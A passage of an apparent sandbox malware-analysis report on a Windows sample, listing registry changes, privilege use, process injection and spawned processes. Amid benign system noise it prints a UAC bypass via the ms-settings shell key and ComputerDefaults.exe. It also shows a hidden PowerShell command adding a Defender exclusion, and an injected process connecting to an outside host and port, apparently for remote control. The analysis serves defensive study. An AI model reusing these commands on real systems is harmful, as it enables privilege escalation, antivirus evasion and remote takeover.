Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133328613974282575" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\ms-settings\shell C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\ms-settings\shell\open\command\ = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\\Users\\Admin\\AppData\\Local\\Temp\\LHost\\hDvkdxlbo.exe'" C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\ms-settings C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\ms-settings\shell\open\command\DelegateExecute C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3872 wrote to memory of 3840 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\explorer.exe
PID 3872 wrote to memory of 3840 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\explorer.exe
PID 3872 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3872 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3872 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3872 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3872 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3872 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3872 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3872 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3872 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\System32\ComputerDefaults.exe
PID 3872 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\System32\ComputerDefaults.exe
PID 3664 wrote to memory of 2752 N/A C:\Windows\System32\ComputerDefaults.exe C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
PID 3664 wrote to memory of 2752 N/A C:\Windows\System32\ComputerDefaults.exe C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe

"C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\System32\ComputerDefaults.exe

"C:\Windows\System32\ComputerDefaults.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe

"PowerShell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LHost\hDvkdxlbo.exe'

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 404 -p 4276 -ip 4276

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4276 -s 3760

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

